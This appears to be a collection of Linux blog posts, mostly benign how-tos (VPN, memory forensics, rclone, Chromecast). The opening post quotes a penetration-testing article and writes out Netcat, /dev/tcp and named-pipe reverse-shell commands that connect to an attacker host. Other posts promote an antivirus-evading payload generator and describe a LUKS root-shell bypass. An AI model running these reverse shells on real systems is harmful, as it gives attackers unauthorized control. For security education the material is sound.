Reverse shell with Netcat: some use cases

What do you do if you have a Netcat that doesn’t support the -e or -c options to run a shell or your target doesn’t support /dev/tcp?


On the SANS Penetration Testing blog I've read a really useful article about Netcat, especially about using this tool to create a reverse backdoor shell during a penetration test.

The post, written by Ed Skoudis, starts with a description of Netcat and a simple example of a backdoor shell:

Netcat is a fantastic little tool included on most Linuxes and available for Windows as well. You can use Netcat (or its cousin, Ncat from the Nmap project) to create a reverse shell as follows:

First, on your own pen test machine, you create a Netcat listener waiting for the inbound shell from the target machine:

attacker@pentestbox# nc -nvlp 443

Here, I’m telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), to listen (-l) on a given local port (-p).

[…]

Then, on the target machine, get the following command to execute (perhaps via command injection in a web app or some other attack technique):

victim$ nc pentestbox 443 -e /bin/bash

This command invokes a Netcat client on the victim, which connects to the attacker’s pentestbox on TCP port 443. The Netcat client then executes /bin/bash (-e /bin/bash) on the victim, connecting that shell’s Standard Input and Standard Output to the network.

[…]

Then, on the pentestbox machine, we’ll see the inbound connection, which we can type commands into as follows (the typed commands here are whoami and hostname):

attacker@pentestbox# nc -nvlp 443
listening on [any] 443 ...
connect to [AttackerIPaddress] from (UNKNOWN) [VictimIPaddress]
whoami
apache
hostname
victim

Simple, right? But, what if you have a version of Netcat that doesn’t support the -e option?

You could use /dev/tcp to implement a Netcat-like backdoor without using Netcat, but to use that technique you need a bash that supports /dev/tcp.
However, some Debian variants ship a bash compiled without /dev/tcp support.
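If your target’s bash does support /dev/tcp, the classic one-liner (run on the victim, with the same Netcat listener waiting on the attacker’s side; host and port are illustrative) is:

/bin/bash -i >& /dev/tcp/pentestbox/443 0>&1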

At this point Ed Skoudis shows some techniques to create a reverse shell even in these restricted environments; I suggest continuing the reading at this link:

https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/
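For the impatient, the core trick shown there is to wire a shell’s input and output through a plain Netcat client using a FIFO (named pipe); roughly, on the victim:

mkfifo /tmp/backpipe
/bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe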

How to use a Cisco PCF file to connect to a corporate VPN with Linux

In four simple steps!


Do you have a configuration file for a Cisco VPN client (PCF) and do you need to use it on your Linux box?

“It could work!”

You can convert the PCF file and connect to the corporate VPN in 4 simple steps:

  1. Open a terminal with root permissions.
  2. Install the vpnc client:

apt-get install vpnc

  3. Convert the PCF file into a vpnc configuration file (an example of the generated file is shown after this list):

pcf2vpnc profile.pcf profile.conf

  4. Start the VPN connection using the generated configuration file:

vpnc ./profile.conf
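For reference, the generated profile.conf is a plain-text vpnc configuration; a minimal example (gateway, group name, group secret and username are placeholders) looks roughly like this:

IPSec gateway vpn.example.com
IPSec ID MyGroupName
IPSec secret MyGroupSecret
Xauth username myusername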

The VPN connection can be disconnected with this command:

vpnc-disconnect

That’s all!

Linux kernel explained, with a comic

“What is it, and how does it work?”

A funny explanation of the Linux kernel, in a comic by Consolia.

https://consolia-comic.com/comics/kernel

I think more developers should know how the Linux kernel works. Regarding it as a black box only gets you so far.

On a different note, some interesting things about the kernel I couldn’t share in the comic:

  • The kernel implements networking protocols such as IP, TCP and UDP, but application protocols such as FTP, DNS and HTTP are not part of the kernel — they are implemented in user space instead.
  • /proc is an illusion, it’s just a way for the kernel to talk to you — and for you to talk to the kernel.
  • All but two of the world’s 500 most powerful supercomputers run on Linux (the other two run on IBM AIX).
  • At the time of writing, the Linux kernel has 18 million lines of code.

About Consolia

Techy, sciencey, nerdy, slightly weird, all rolled into a comic.

Automated memory capture and analysis on Linux with Linux Memory Grabber

A script for dumping Linux memory and creating Volatility profiles


I have already written something about dumping volatile memory on Linux systems.
Recently I discovered this useful script, developed by Hal Pomeranz, that automates all the steps required to capture memory and prepare it for analysis with Volatility.


A lot of steps!

In order to perform a memory analysis on a Linux system, you first need to be able to capture volatile memory, and that requires a kernel module compiled specifically for the kernel of the system where you want to grab RAM.

Then, in order to analyze the dump with Volatility, you need to create a profile that matches the system where the memory was captured: to do this, you have to compile a C program on the system and use dwarfdump to get the addresses of important kernel data structures.

This is not easy: there are a number of steps and some low-level Linux commands involved.
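To give an idea, the manual workflow looks roughly like this (a sketch; it assumes the LiME and Volatility sources are already available on the target, and all paths are illustrative):

# Build LiME against the running kernel and dump RAM to a USB drive
cd lime/src && make
sudo insmod lime-$(uname -r).ko "path=/mnt/usb/memory.lime format=lime"

# Build a Volatility profile for this kernel
cd volatility/tools/linux && make
sudo zip /mnt/usb/$(hostname)-profile.zip module.dwarf /boot/System.map-$(uname -r)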

The “Linux Memory Grabber” script can automate all these steps.

ON FORENSIC PURITY
==================

If you're a stickler for forensic purity, this is probably not the
tool for you. Let's discuss some of the ways in which my tool interacts
with the target system:

Removable Media -- The tool is designed to be run from a portable USB
device such as a thumb drive. You are going to be plugging a writable
device into your target system, where it could potentially be targeted
by malicious users or malware on the system. The act of plugging the
device into the system is going to change the state of the machine
(e.g., create log entries, mtab entries, etc). If the device is not
auto-mounted by the operating system, the user must manually mount the
device via a root shell.

Compilation -- lmg builds a LiME kernel module for the system.
Creating a Volatility(TM) profile also involves compiling code on
the target machine. So gcc will be executed, header files read,
libraries linked, etc. lmg tries to minimize impact on the file
system of the target machine by setting TMPDIR to a directory on
the USB device lmg runs from. This means that intermediate files
created by the compiler will be written to the thumb drive rather
than the local file system of the target machine.

Dependencies -- In order to compile kernel code on Linux, the target
machine needs a working development environment with gcc, make, etc
and all of the appropriate include files and shared libraries.
And in particular, the kernel header files need to be present on
the local machine. These dependencies may not exist on the target.
In this case, the user is faced with the choice of installing
the appropriate dependencies (if possible) or being unable to
acquire memory from the target.

Malware -- lmg uses /bin/bash, gcc, zip, and a host of other programs from
the target machine. If the system has been compromised, the applications
lmg uses may not be trustworthy. A more complete solution would be
to create a secure execution environment for lmg on the portable USB
device, but that was beyond the scope of this initial proof of concept.

Memory -- All of the commands being run will cause the memory of the
target system to change. The act of capturing RAM will always create
artifacts, but in this case there is extensive compilation, file system
access, etc in addition to running a RAM dumper.

All of that being said, lmg is a very convenient tool for allowing
less-skilled agents to capture useful memory analysis data from
target systems.

Note that lmg will look for an already existing LiME module on the
USB device that matches the kernel version and processor architecture
of the target machine. If found, lmg will not bother to recompile.
Similarly, you may choose to not have lmg create the Volatility(TM)
profile for the target in order to minimize the impact on the target system.

lmg uses relative path names when invoking programs like gcc and zip.
So if you wish to run these programs from alternate media, simply update
$PATH as appropriate before running lmg.

The usage is pretty simple:

When you wish to acquire RAM, plug the thumb drive into your target
system. On most Linux systems, new USB devices will get automatically
mounted under /media. Let’s assume yours ends up under /media/LMG.

Now, as root, run “/media/LMG/lmg”. This is interactive mode and
the user will be prompted for confirmation before lmg builds a LiME
module for the system and/or creates a Volatility(TM) profile.
If you don’t want to be prompted, use “/media/LMG/lmg -y”.

Everything else is automated. After the script runs, you will have
a new directory on the thumb drive named 

 “…/capture/<hostname>-YYYY-MM-DD_hh.mm.ss”

lmg supports a -c option for specifying a case ID directory name to be
used instead of the default “<hostname>-YYYY-MM-DD_hh.mm.ss” directory.

Whatever directory name is used, the directory will contain:

 <hostname>-YYYY-MM-DD_hh.mm.ss-memory.lime — the RAM capture
 <hostname>-YYYY-MM-DD_hh.mm.ss-profile.zip — Volatility(TM) profile
 <hostname>-YYYY-MM-DD_hh.mm.ss-bash — copy of target’s /bin/bash
 volatilityrc — prototype Volatility config file

The volatilityrc file points Volatility at the captured memory image and the
generated profile.
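As a rough sketch of the next step (directory layout, profile name and plugin are illustrative, not produced by lmg), you can register the profile with Volatility 2 and run a plugin against the capture:

cp <hostname>-YYYY-MM-DD_hh.mm.ss-profile.zip <volatility>/volatility/plugins/overlays/linux/
python vol.py --info | grep Linux        # verify that the new Linux profile is listed
python vol.py --profile=Linux<profile>x64 -f <hostname>-YYYY-MM-DD_hh.mm.ss-memory.lime linux_pslist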

For more technical information and installation instructions, please refer to the GitHub repository:

https://github.com/halpomeranz/lmg

Want to test your antivirus with a custom malware payload?

You can, with HERCULES!


HERCULES is a tool, developed in Go by Ege Balcı, that can generate payloads that elude antivirus software.

The tool is useful for generating PoCs to check the accuracy of various antivirus solutions: the payload is obfuscated and packed using UPX.

WHAT IS UPX ?

UPX (Ultimate Packer for eXecutables) is a free and open-source executable packer supporting a number of file formats from different operating systems. UPX simply takes the binary file and compresses it; the packed binary unpacks (decompresses) itself into memory at runtime.
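For example, packing and unpacking a binary with UPX is a one-liner each (file names are illustrative):

upx -9 -o payload-packed payload      # compress with maximum compression
upx -d payload-packed                 # restore the original binary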


Installation

HERCULES supports these Linux distributions:

  • Ubuntu: 16.04 / 15.10
  • Kali Linux: Rolling / Sana
  • Manjaro: all versions
  • Arch Linux: all versions
  • BlackArch: all versions
  • Parrot OS: 3.1

To install it, fetch the dependencies and run the setup script from inside the cloned repository:

go get github.com/fatih/color
go run Setup.go

More info and downloads

https://github.com/EgeBalci/HERCULES/

Reinstall a running Linux system via SSH without rebooting, with takeover.ssh

It may sound like science fiction, but it is possible! (Running in RAM!)


And you can do it with this script, developed by Héctor Martín Cantero:

A script to completely take over a running Linux system remotely, allowing you to log into an in-memory rescue environment, unmount the original root filesystem, and do anything you want, all without rebooting. Replace one distro with another without touching a physical console.

…this script will not (itself) make any permanent changes to your existing root filesystem (assuming you run it from a tmpfs), so as long as you can remotely reboot your box using an out-of-band mechanism, you should be OK.

How does it work?

Seven simple steps:

  1. Create a directory /takeover on your target system and mount a tmpfs on it.
  2. Extract your rescue environment there. Make sure it works by chrooting into it and running a few commands. Make sure you do not bork filesystem permissions. Exit the chroot.
  3. Grab a recent copy of busybox (statically linked; binaries are available from busybox.net) and put it in /takeover/busybox. Make sure it works by trying something like /takeover/busybox sh (a command sketch of steps 1-3 follows the list).
  4. Copy the contents of this repository into /takeover.
  5. Compile fakeinit.c. It must be compiled such that it works inside the takeover environment. If your rescue environment has gcc, you can just compile it inside the chroot: chroot /takeover gcc /fakeinit.c -o /fakeinit. Otherwise, you might want to statically link it.
  6. Shut down as many services as you can on your host. takeover.sh will by default set up an SSHd listening on port 80, though you may edit this in the script.
  7. Run sh /takeover/takeover.sh and follow the prompts.
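As a rough illustration of steps 1-3 (a sketch; the archive and binary names are placeholders):

mkdir /takeover
mount -t tmpfs -o size=1G tmpfs /takeover        # step 1: tmpfs for the rescue environment
tar -xzf rescue-rootfs.tar.gz -C /takeover       # step 2: extract the rescue environment
chroot /takeover /bin/sh -c "echo chroot OK"     # quick sanity check of the chroot
cp busybox-x86_64 /takeover/busybox              # step 3: a statically linked busybox
/takeover/busybox sh -c 'echo busybox OK'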

If everything worked, congratulations! You may now use your new SSH session to kill any remaining old daemons (kill -9 is recommended to make sure they don’t try to do anything silly during shutdown), and then unmount all filesystems under /old_root, including /old_root itself. You may want to first copy /old_root/lib/modules into your new tmpfs in case you need any old kernel modules.

takeover.sh could be extended to support re-execing a new init once you’re done. This could be used to switch to a new distro entirely without rebooting, as long as you’re happy using the old kernel. If you’re interested, pull requests welcome :-).

More info and download

https://github.com/marcan/takeover.sh

How to sync your GoogleDrive storage on Linux with Rclone

And some tips to integrate it on XFCE4

Google Drive is definitely a great cloud storage service.
However, it suffers from significant limitations, including the lack of an official sync client for Linux.

Fortunately there are many tools that allow you to access Google Drive from Linux, but none of them provides a user experience similar to the Windows/OS X client.

So, for my Debian laptop, I have written some scripts to synchronize my Google Drive documents using Rclone.

Rclone is a command line program to sync files and directories to and from many cloud storage providers:

  • Google Drive
  • Amazon S3
  • Openstack Swift / Rackspace cloud files / Memset Memstore
  • Dropbox
  • Google Cloud Storage
  • Amazon Drive
  • Microsoft OneDrive
  • Hubic
  • Backblaze B2
  • Yandex Disk
  • The local filesystem

Rclone is extremely powerful; however, the ‘sync’ command is not bidirectional, so some workarounds are needed to get an acceptable user experience.

For information about rclone installation you can refer to the official guide:

http://rclone.org/install/

and here is a simple guide to configure Google Drive:

http://rclone.org/drive/

Once Rclone is installed and the Google Drive account is properly configured, let’s create a couple of scripts to get an experience similar to git, with the ability to perform ‘push’ and ‘pull’ operations to and from the cloud storage:

https://gist.github.com/andreafortuna/925a781c1e5ab1e70c4b9ffcb7ed2158

https://gist.github.com/andreafortuna/814be0b16c734fbd3954f40c3e71d4b1

The scripts can be saved in a hidden directory in your home (such as ~/.scripts/): if you run one of these scripts from a directory inside the ‘Documents’ folder, it synchronizes that directory to the cloud storage (push) or from the remote storage to the local disk (pull).
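To give an idea of what such scripts do (a sketch, not the exact content of the gists above; the remote name "GoogleDrive" and the Documents layout are just examples), the push script boils down to something like this:

#!/bin/bash
# googledrive_push.sh (sketch): push the current directory to Google Drive
REL="${PWD#$HOME/Documents/}"                     # path relative to ~/Documents
rclone sync "$PWD" "GoogleDrive:Documents/$REL"

# the pull script is the mirror image:
# rclone sync "GoogleDrive:Documents/$REL" "$PWD"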


Integrate the scripts with XFCE4 Thunar

On my laptop I use XFCE4 as desktop environment. The default file manager (Thunar) has a useful feature: Custom Actions.

Thunar allows users to add custom actions to the file and folder context menus (by the use of the thunar-uca plugin, part of the Thunar distribution, in the plugins/ subdirectory). You can set up new actions in the Custom Actions dialog, available via the Configure custom actions… item in the Edit menu.

So I have created two custom actions in order to perform the push and pull operations directly from the graphical interface.


Simply create one custom action named ‘GoogleDrive Pull’ with this command line:

xterm -hold -e ~/.scripts/googledrive_pull.sh

and another named ‘GoogleDrive Push’ with this command:

xterm -hold -e ~/.scripts/googledrive_push.sh

In this way, by right-clicking on a directory within the ‘Documents’ folder, you can download the updated version from Google Drive or upload the local changes to the cloud.

How to dump volatile memory of a Linux machine?

Priceless data in case of attack!


Properly making a copy of the RAM of a Linux machine can be essential for forensic analysis after a cyberattack: just like the data on disk, the data in memory may contain valuable information, and it can be saved using tools already present in the operating system.

Linux provides two virtual devices for this purpose: /dev/mem (mapped to the physical system memory) and /dev/kmem (which maps the kernel virtual address space), but in many distributions they are disabled or restricted for security reasons.

On recent Linux systems, /dev/mem provides access only to a restricted range of addresses, rather than the full physical memory of a system. On other systems it may not be available at all. Throughout the 2.6 series of the Linux kernel, the trend was to reduce direct access to memory via pseudo-device files.

On Red Hat systems (and derived distros such as CentOS), the /dev/crash pseudo-device can be enabled by loading the crash driver with the command

modprobe crash

and used to access the memory.

On other distributions with 2.6 kernels, the fmem module can be used: it creates the device /dev/fmem, similar to /dev/mem but without the address-range limitations.
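The fmem module has to be compiled against the running kernel; as a sketch (assuming the fmem sources and the kernel headers are available):

make                 # builds fmem.ko for the running kernel
sudo insmod fmem.ko  # loads the module and creates /dev/fmem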

Once the pseudo-device is enabled, the memory dump can be performed with a command like:

sudo dd if=/dev/fmem of=/tmp/memory.raw bs=1MB

Next, the dump can be analyzed using Volatility.

Are you using Linux disk encryption? It can be bypassed by pressing ‘Enter’ for 70 seconds!

A really dumb bug, but with a really simple fix!


A vulnerability in Cryptsetup, a utility used to set up encrypted filesystems on Linux distributions, could allow an attacker to obtain a root rescue shell on some systems.

The security issue was discovered by the security researcher Hector Marco and relates to a vulnerability (CVE-2016-4484) in the implementation of the Cryptsetup utility used for encrypting hard drives via Linux Unified Key Setup (LUKS, the standard implementation of disk encryption on Linux-based operating systems).

The Cryptsetup utility has a strange way of handling password failures for the decryption process when a system boots up, permitting a user to retry the password multiple times.



When a user reaches 93 password attempts, they are dropped to a shell that has root privileges.

In other words, if you enter a blank password 93 times — or simply hold down the ‘Enter’ key for roughly 70 seconds — you will gain access to a root initramfs shell.


Can I fix it?

If your distribution is vulnerable and a patch is not yet available, the vulnerability can be mitigated by modifying the GRUB configuration, adding the “panic” parameter to the kernel command line so that a failed boot does not drop to a shell:

# sed -i 's/GRUB_CMDLINE_LINUX_DEFAULT="/GRUB_CMDLINE_LINUX_DEFAULT="panic=5 /' /etc/default/grub
# grub-install
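On Debian-based systems you may also need to regenerate the GRUB configuration so that the new kernel parameter is actually applied, for example:

# update-grub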

More technical information is available on Hector Marco’s website.

Streaming media contents from Linux to Chromecast?

It’s simple, with Stream2Chromecast!


Are you searching for an easy way to stream media files from your Linux box to a Chromecast?

You can use Stream2chromecast, a simple Python script that makes the task of streaming media files to a Chromecast device ridiculously easy.

Simply clone the project’s GitHub repository with this command:

git clone https://github.com/Pat-Carter/stream2chromecast.git

Now, to stream a media file, start the script with this command line:

stream2chromecast.py /path/to/foo.mp4

The utility also supports basic playback controls through -pause, -continue and -stop options.

Subtitles?

Only the WebVTT format is currently supported.

If you have an SRT subtitle file, you can convert it with this online tool:

http://www.webvtt.org/
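Alternatively, if ffmpeg is installed, the conversion can be done locally (a simple option, not part of the Stream2chromecast documentation):

ffmpeg -i /path/to/subtitles.srt /path/to/subtitles.vtt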

To cast the subtitles on /path/to/subtitles.vtt use this command:

stream2chromecast.py -subtitles /path/to/subtitles.vtt /path/to/foo.mp4

More info and download

https://github.com/Pat-Carter/stream2chromecast